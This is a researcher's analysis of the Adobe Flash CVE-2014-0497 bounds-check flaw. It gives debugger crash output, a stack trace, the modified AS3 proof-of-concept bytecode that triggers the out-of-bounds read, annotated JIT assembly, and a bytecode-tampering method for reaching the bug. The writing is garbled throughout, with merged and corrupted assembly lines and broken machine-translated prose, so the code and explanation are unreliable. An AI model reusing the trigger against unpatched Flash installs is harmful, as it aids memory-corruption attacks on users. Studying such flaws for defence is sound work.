Adobe Flash CVE-2014-0497 Vulnerability Analysis

Adobe Flash Player was exposed during the Spring Festival 0-Day Vulnerability (No.: CVE-2014-0497), the vulnerability hazards Flash 12.0.0.38 and earlier versions. Adobe has released patches.

This vulnerability is caused by an error in parsing the embedded AS3 code in SWF. In the sample file for analysis, you can view the AS3 code in the sample file through AS3 Sorcerer. In AS3, li32 and ByteArray are used to achieve fast memory reading. According to Adobe's official explanation, the li32 function parameter is an index value of the ByteArray array. This function can quickly access data in ByteArray to variables, however, the size of the index value must be between the length of the array from 0 to ByteArray, which means that this function performs a boundary check, when generating the array boundary check code, we will judge whether it is an unsigned number based on the constructed data. Here we construct malicious data to generate a non-Signed comparison code.

When a symbolic number comparison code is generated, the "sub esi, 4" command is generated. This command is used to subtract the array length by 4 to prevent buffer overflow when reading int data from byte arrays, when an unsigned number comparison code is generated, "sub esi, 8004h 4H 4H" is generated. In esi, the array length is 0 × 1000. After this command, it becomes a negative number, that is, a large unsigned number. During the unsigned match jump, when the index value is greater than the length, it will jump to the array out-of-bounds processing program, and the length is far greater than the index value, so you can continue to execute, therefore, the data outside the array is read, and overflow occurs.

Crash:

(17c.5e4): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=8357e000 ebx=0357e000 ecx=02bcbaf0 edx=80002100 esi=80000000 edi=02843fc8eip=02e5f45e esp=0012e728 ebp=0012e8c0 iopl=0         nv up ei ng nz na pe nccs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=0025028602e5f45e 8b0410          mov     eax,dword ptr [eax+edx] ds:0023:03580100=********

Content in the array:

06cc4000  6f6d336d 00007972 00000000 00000000  m3mory.......... 06cc4010  00000000 00000000 00000000 00000000  ................ 06cc4020  00000000 00000000 00000000 00000000  ................ 06cc4030  00000000 00000000 00000000 00000000  ................ 06cc4040  00000000 00000000 00000000 00000000  ................ 06cc4050  00000000 00000000 00000000 00000000  ................ 06cc4060  00000000 00000000 00000000 00000000  ................ 06cc4070  00000000 00000000 00000000 00000000  ................

When the vulnerability occurs, the data of the specified index is read from the eax array, and the data zone cannot be accessed.

 

0:000> kvChildEBP RetAddr  Args to ChildWARNING: Frame IP not in any known module. Following frames may be wrong.0012e8c0 009d9231 066db910 00000000 0012e910 0x682cefc0012e8e4 009d9f85 066db910 00000000 0012e910 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10beb10012e938 009d9a1e 066db910 00000000 0012e98c Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10cc050012e974 009c26fd 00000000 0012e98c 06663180 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0x10c69e0012ea20 009c45be 01a23020 0191c1f0 00000000 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf537d0012ea4c 0048ced4 018fb060 00000001 018fb060 Flash_player_12_0!IAEModule_IAEKernel_UnloadModule+0xf723e0012eae8 0048d32b 018fb060 0012ecc4 00000000 Flash_player_12_0!WinMainSandboxed+0x89be80012eb18 0048dd4c 00000008 00000000 0012ecc4 Flash_player_12_0!WinMainSandboxed+0x8a03f0012ec7c 00426f3b 018fd0a0 07ffffff 07ffffff Flash_player_12_0!WinMainSandboxed+0x8aa6000000000 00000000 00000000 00000000 00000000 Flash_player_12_0!WinMainSandboxed+0x23c4f

Stack backtracking

 

009d9220 8b4d10 mov ecx, dword ptr [ebp + 10 h] 009d9223 8b5008 mov edx, dword ptr [eax + 8] 009d9226 8b5204 mov edx, dword ptr [edx + 4] 009d9229 51 push ecx009d922a 8b4d0c mov ecx, dword ptr [ebp + 0Ch] 009d922d 51 push limit 50 push limit ffd2 call edx // call the dynamically generated code. 009d9231 83c40c add esp, 0Ch

Before parsing the AS3 code TestExploit (), Flash will parse other code, such as function script0 $ init (): *, function script0 $ init ():*, testExploit () is entered only after the code is parsed ().

Therefore, it will go into the dynamically generated code area multiple times. The researchers can record the EDX every time. When the crash occurs, they will go to the last EDX code area and analyze it. The flash timer and its own mechanism will have a great impact on the results of the vulnerability study. Therefore, you must quickly find the breakpoint during debugging, the overflow location is the same as the offset of the EDX data. When you enter the virtual code, you can break the breakpoint under the offset address to quickly track the overflow location.

Bytecode:

 

6 constructsuper (0) 8 pushuint 2147483648 // 0x80000000 // The modified bytecode changes the double type to the Uint type. 10 setlocal111 findpropstrict flash. utils: ByteArray // nameIndex = 213 constructprop flash. utils: ByteArray (0) // nameIndex = 216 coerce flash. utils: ByteArray // nameIndex = 218 setlocal219 getlocal220 pushshort 409623 setproperty length // nameIndex = 725 getlocal226 pushstring "m3mory" // stringIndex = 18 // array assigned 28 callpropvoid category (1) // nameIndex = 831 getlex flash. system :: applicationDomain // nameIndex = 1333 getproperty currentDomain // nameIndex = 535 getlocal236 setproperty domainMemory // nameIndex = 638 getlocal139 pushint 2147475196 // subtract the data from the variable to obtain the index pressure stack and pass it to li3241 subtract42 li32 // in this function, the comparison of the previously passed index has exceeded 43 setlocal344 getlocal145 pushshort 844848 add49 li3250 pushint 305419896/0x1234567852 ifne L1

 

Compilation code

 

0682ced3 8b5014 mov edx, dword ptr [eax + 14 h] // index address of the array 0682ced6 8b7018 mov esi, dword ptr [eax + 18 h] // array size 0682ced9 8d8300210080 lea eax, [ebx-7 ***** h] // ebx = _ local4, the data constructed by eax is used as the index value for reading the array. 0682 cedf 81ee04000080 sub esi, 80000004 h // because int32 data is read from byte, the last index address can only be an array length of-4; otherwise, overflow may occur, however, an overflow occurs during the border check. Here, the vulnerability uses a person to construct a special structure so that it is not reduced by 4, but by 80000004, and esi becomes a negative number, the following comparison of the number of unsigned values is used for the border check. 0682cee5 3bc6 cmp eax, esi // compare the array length and the index value 0682cee7 8bb5dcfeffff mov esi, dword ptr [ebp-124h] 0682 ceed 0f878b000000 ja 0682cf7e // If eax> esi jump, if the value is smaller than the value, the original eax> esi will not jump. After the subtraction above, the integer will overflow downward and then perform the unsigned match. If the jump is normal, it will enter the array out-of-bounds handler. 0682cef3 8bc2 mov eax, edx // eax storage array index 0682cef5 03c3 add eax, ebx // ebx is constructed in poc value 0682cef7 bb00210080 mov ebx, 80002100 h // assign the address offset to ebx0682cefc 8b0418 mov eax, dword ptr [eax + ebx] ds: 0023: 06cd4000 = ???????? // Data Reading is because the POC heat stroke we constructed gives a large enough distance to overflow every time data is read. 0682 ceff 894588 mov dword ptr [ebp-78h], eax normal AS3 generated assembly code 06b39f0e 8b45c8 mov eax, dword ptr [ebp-38h] 06b39f11 8b5314 mov edx, dword ptr [ebx + 14 h] 06b39f14 8b7318 mov esi, dword ptr [ebx + 18 h] 06b39f17 8d9805210080 lea ebx, [eax-7FFFDEFBh] 06b39f1d 8bfe mov edi, 10983ef04 sub edi, 20173bdf cmp ebx, edi06b39f24 7768 ja 06b39f8e 06b39f26 8347mov ebx, %03d8 add ebx, %bf05210080 mov edi, %8b1c3b mov ebx, dword ptr [ebx + edi]

Assembly code generated by normal AS3

06b39f0e 8b45c8 mov eax, dword ptr [ebp-38h] 06b39f11 8b5314 mov edx, dword ptr [ebx + 14 h] 06b39f14 8b7318 mov esi, dword ptr [ebx + 18 h] 06b39f17 8d9805210080 lea ebx, [eax-7FFFDEFBh] 06b39f1d 8bfe mov edi, esi 06b39f1f 83ef04 sub edi, 4 // here, the value is 4 instead of 80000004 06b39f22 3bdf cmp ebx, edi 06b39f24 7768 ja 06b39f26 8da-mov ebx, edx 06b39f28 03d8 add ebx, eax 06b39f2a bf05210080 mov edi, 80002105 h 06b39f2f 8b1c3b mov ebx, dword ptr [ebx + edi]

The cause of this vulnerability is that Flash has encountered an error in the access control of the unsigned number and signed data, leading to the downloading of signed integers. You can use the bytecode modification tool to modify the bytecode of the swf file and change the number of signed characters to the number of unsigned characters, the error code is generated when the code is generated.

The normal AS3 file generation bytecode is:

 

Normal AS3 file generation bytecode: pushdouble 2147483648 // 0x80000000 modified bytecode pushuint 2147483648 // 0x80000000

By Jason & hcl of code audit labs of vulnhunt.com